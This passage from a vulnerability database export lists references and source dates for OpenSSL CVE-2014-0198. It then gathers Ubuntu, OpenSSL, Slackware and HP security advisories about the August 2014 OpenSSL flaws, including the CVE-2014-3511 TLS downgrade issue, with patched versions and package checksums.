"http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004830" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690128" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004695" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03b" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03f" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-bd9a1cf60e344c549c4888db93" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-3395d737d98f42149125b9bb05" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-e8076c2a35804685ad65b2b1ba" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-c0d32bac154a4d93839d8cd1f2" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-8aefeaf490284a7691eca97d13" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/476.html" }, { "trust": 0.1, "url": "https://www.debian.org/security/./dsa-2931" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2192-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0198" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34106" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-511c3e0b2f6f4f6bbc796fc619" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-3a7aa5e233904ebe847a5e1555" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-d775367b0a28449ca05660778b" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-f6c141a7feeb4a358bbb28300f" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3470" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-5298" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0198" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0224" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0195" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "http://h17007.www1.hp.com/us/en/enterprise/servers/products/service_pack/hpsu" }, { "trust": 0.1, "url": "https://twitter.com/vmwaresrc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "http://www.vmware.com/security/advisories" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/1055" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/2077359" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/lifecycle.html" }, { "trust": 0.1, "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/security_response.html" }, { "trust": 0.1, "url": "https://www.vmware.com/patchmgr/download.portal" }, { "trust": 0.1, "url": "https://tmc.tippingpoint.com." }, { "trust": 0.1, "url": "http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-8208c3987b1b4a5093f3e8fcc3" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0224.html" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0198.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/site/solutions/906703" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/904433" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2010-5298.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0628.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3470.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0221.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0195.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0198" }, { "db": "BID", "id": "67193" }, { "db": "PACKETSTORM", "id": "126710" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "126532" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "129218" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "CNNVD", "id": "CNNVD-201405-057" }, { "db": "NVD", "id": "CVE-2014-0198" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-0198" }, { "db": "BID", "id": "67193" }, { "db": "PACKETSTORM", "id": "126710" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "126532" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "129218" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "CNNVD", "id": "CNNVD-201405-057" }, { "db": "NVD", "id": "CVE-2014-0198" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-05-06T00:00:00", "db": "VULMON", "id": "CVE-2014-0198" }, { "date": "2014-05-02T00:00:00", "db": "BID", "id": "67193" }, { "date": "2014-05-19T17:01:19", "db": "PACKETSTORM", "id": "126710" }, { "date": "2014-06-25T21:32:38", "db": "PACKETSTORM", "id": "127213" }, { "date": "2014-05-08T17:00:26", "db": "PACKETSTORM", "id": "126532" }, { "date": "2014-08-08T21:53:16", "db": "PACKETSTORM", "id": "127807" }, { "date": "2014-07-28T20:36:25", "db": "PACKETSTORM", "id": "127630" }, { "date": "2017-01-25T21:54:44", "db": "PACKETSTORM", "id": "140720" }, { "date": "2014-07-02T21:43:37", "db": "PACKETSTORM", "id": "127326" }, { "date": "2014-06-11T23:18:46", "db": "PACKETSTORM", "id": "127045" }, { "date": "2014-11-21T18:56:39", "db": "PACKETSTORM", "id": "129218" }, { "date": "2014-06-05T21:13:52", "db": "PACKETSTORM", "id": "126961" }, { "date": "2014-06-27T18:43:23", "db": "PACKETSTORM", "id": "127265" }, { "date": "2014-06-05T15:19:35", "db": "PACKETSTORM", "id": "126930" }, { "date": "2014-05-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201405-057" }, { "date": "2014-05-06T10:44:05.470000", "db": "NVD", "id": "CVE-2014-0198" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-08-29T00:00:00", "db": "VULMON", "id": "CVE-2014-0198" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "67193" }, { "date": "2022-08-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201405-057" }, { "date": "2022-08-29T20:50:31.340000", "db": "NVD", "id": "CVE-2014-0198" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127630" }, { "db": "CNNVD", "id": "CNNVD-201405-057" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL \u2018 do_ssl3_write \u2018Function buffer error vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201405-057" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201405-057" } ], "trust": 0.6 } }
var-201408-0081
Vulnerability from variot
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 1.0.1 before 1.0.1i allows man-in-the-middle attackers to force the use of TLS 1.0 by triggering ClientHello message fragmentation in communication between a client and server that both support later TLS versions, related to a "protocol downgrade" issue. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. OpenSSL 1.0.1 versions prior to 1.0.1i are vulnerable. ============================================================================ Ubuntu Security Notice USN-2308-1 August 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
Adam Langley and Wan-Teh Chang discovered that OpenSSL incorrectly handled certain DTLS packets. (CVE-2014-3506)
Adam Langley discovered that OpenSSL incorrectly handled memory when processing DTLS fragments. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain applications, an attacker may use this issue to possibly gain access to sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-5139)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.17
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.20
After a standard system update you need to reboot your computer to make all the necessary changes. OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
OpenSSL 0.9.8 users should upgrade to 0.9.8zb OpenSSL 1.0.0 users should upgrade to 1.0.0n. OpenSSL 1.0.1 users should upgrade to 1.0.1i.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team.
Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)
The issue affects OpenSSL clients and allows a malicious server to crash the client with a null pointer dereference (read) by specifying an SRP ciphersuite even though it was not properly negotiated with the client. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)
If a multithreaded client connects to a malicious server using a resumed session and the server sends an ec point format extension it could write up to 255 bytes to freed memory.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz.
Double Free when processing DTLS packets (CVE-2014-3505)
An attacker can force an error condition which causes openssl to crash whilst processing DTLS packets due to memory being freed twice. This can be exploited through a Denial of Service attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory exhaustion (CVE-2014-3506)
An attacker can force openssl to consume large amounts of memory whilst processing DTLS handshake messages. This can be exploited through a Denial of Service attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory leak from zero-length fragments (CVE-2014-3507)
By sending carefully crafted DTLS packets an attacker could cause openssl to leak memory. This can be exploited through a Denial of Service attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack. A malicious server can crash the client with a null pointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and sending carefully crafted handshake messages.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
OpenSSL 1.0.1 SSL/TLS users should upgrade to 1.0.1i.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. This update fixes several security issues: Double Free when processing DTLS packets (CVE-2014-3505) DTLS memory exhaustion (CVE-2014-3506) DTLS memory leak from zero-length fragments (CVE-2014-3507) Information leak in pretty printing functions (CVE-2014-3508) Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509) OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510) OpenSSL TLS protocol downgrade attack (CVE-2014-3511) SRP buffer overrun (CVE-2014-3512) Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139) For more information, see: https://www.openssl.org/news/secadv_20140806.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139 ( Security fix ) patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04624296
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04624296 Version: 1
HPSBMU03304 rev.1 - HP Insight Control server deployment on Linux and Windows, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-04-01 Last Updated: 2015-04-01
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH), HP Smart Update Manager (SUM), and HP Version Control Agent (VCA) which are components of HP Insight Control server deployment. These vulnerabilities are related to the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE". The components of HP Insight Control server deployment could be exploited remotely to allow disclosure of information.
HP Insight Control server deployment includes HP System Management Homepage (SMH), HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and deploys them through the following jobs. This bulletin provides the information needed to update the vulnerable components in HP Insight Control server deployment.
Install HP Management Agents for Windows x86/x64 Install HP Management Agents for RHEL 5 x64 Install HP Management Agents for RHEL 6 x64 Install HP Management Agents for SLES 10 x64 Install HP Management Agents for SLES 11 x64 Upgrade Proliant Firmware
References:
CVE-2014-3508 CVE-2014-3509 CVE-2014-3511 CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-3568 CVE-2014-5139 SSRT102004
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3509 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3511 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-3513 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3568 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-5139 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve this vulnerability.
Note: For HP Insight deployment Control server v7.1.2, v7.2.0, v7.2.1 and v7.2.2, you must upgrade to v7.3.1 and follow the steps from 1 to 11 mentioned below to resolve the vulnerability.
Delete the files smh.exe from Component Copy Location listed in the following table, rows 1 and 2. Delete the files vca.exe/vcaamd64-.exe from Component Copy Location listed in the following table, rows 3 and 4. Delete the files hpsmh-7..rpm" from Component Copy Location listed in row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location specified in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
